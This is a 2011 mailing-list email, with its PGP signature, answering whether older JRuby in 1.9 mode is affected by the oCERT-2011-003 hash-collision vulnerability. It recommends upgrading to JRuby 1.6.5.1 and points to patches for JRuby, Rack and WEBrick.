--------------enigED27697F986EFCD4B31468B2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

(2011/12/29 11:44), botp wrote:
> On Wed, Dec 28, 2011 at 7:51 AM, Thomas E Enebo <tom.enebo / gmail.com> w=
rote:
>>> JRuby 1.6.5.1 is a special release with a single patch applied to our=

>>> JRuby 1.6.5 source to correct CERT vulnerability CERT-2011-003
>>> (http://www.ocert.org/advisories/ocert-2011-003.html).  All users are=

>>> recommended to upgrade to JRuby 1.6.5.1 to get this security fix.
>=20
> if i run (the older) jruby w the -1.9 option, would i still be affected=
?

Yes, jruby <=3D 1.6.5 uses sdbm Hash (good old CRuby 1.8's hash function)=

both in 1.8/1.9 mode.  Please upgrade to 1.6.5.1 which uses MurmurHash2
like CRuby 1.9 (both in 1.8/1.9)

If you can't upgrade, try to apply the patch for jruby 1.6 series[1].
If you can't apply the patch, you might be able to get help of the
latest Rack release[2].  If you're using WEBrick for production by
accident, here's an experimental patch[3].

[1] https://github.com/jruby/jruby/compare/9dcd3885...2f607d21
[2] https://groups.google.com/forum/#!topic/rack-devel/Gk74wz5GH_4
[3] https://github.com/nahi/webrick/compare/0daf82f1...ruby_1_8_7

Best regards,
// NaHi


--------------enigED27697F986EFCD4B31468B2
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Cygwin)

iQEcBAEBAgAGBQJPA7SoAAoJEC7N6P3yLbI25KQH/Ag5KJ6F6PmbSJITA/jBJizh
Ws11jeHp/PhHQyNL4OvyYE6uKWPkN9bRbt5sw81iOQ2cOX/mwZPzdMhi/VEAzfZb
K3HzjDS+58mB5P85TOXAG/o0kG0rmFNYsvRl6J40p6+TCxfX0kP1eS/do1HodJFx
RVlaJyY/75vl8hOavjzUUuUP/HfMKL6m21w1I7g0VvxjSEB290soDY5DLJfRadX6
6qVcR7MyAq0qGwWf1FwBx5RWoCnjUem4mQCqa+xBvC4pFFSpMCx+KnfhSAG+QAg0
ez+KnrKm+X6Ikchdy9x7PVAddcDFNskufkMsjgP3cOKNxcnQyoDnccPZjAMkpso=
=aH+U
-----END PGP SIGNATURE-----

--------------enigED27697F986EFCD4B31468B2--